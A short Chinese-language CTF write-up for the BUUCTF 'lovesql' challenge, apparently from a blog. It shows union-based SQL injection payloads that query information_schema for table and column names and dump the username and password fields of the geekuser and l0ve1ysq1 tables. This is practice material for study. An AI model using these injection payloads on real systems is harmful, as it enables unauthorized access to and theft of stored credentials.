47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
Li zlun1 天前
MySQL 性能监控与安全管理完全指南
数据库·mysql·安全
养生技术人1 天前
Oracle OCP认证考试题目详解082系列第48题
运维·数据库·sql·oracle·database·开闭原则·ocp
海阳宜家电脑1 天前
Lazarus使用TSQLQuery更新的一点技巧
数据库·lazarus·tsqlquery
丨我是张先生丨1 天前
SQLSERVER 查找存储过程中某个变量
数据库
感谢地心引力1 天前
【Python】基于 PyQt6 和 Conda 的 PyInstaller 打包工具
数据库·python·conda·pyqt·pyinstaller
lypzcgf1 天前
Coze源码分析-资源库-编辑数据库-后端源码-数据存储层
数据库·coze·coze源码分析·智能体平台·ai应用平台
jackaroo20201 天前
后端_Redis 分布式锁实现指南
数据库·redis·分布式
工作中的程序员1 天前
hive sql优化基础
hive·sql
liuy96151 天前
迷你论坛项目
数据库
杨云龙UP1 天前
小工具大体验:rlwrap加持下的Oracle/MySQL/SQL Server命令行交互
运维·服务器·数据库·sql·mysql·oracle·sqlserver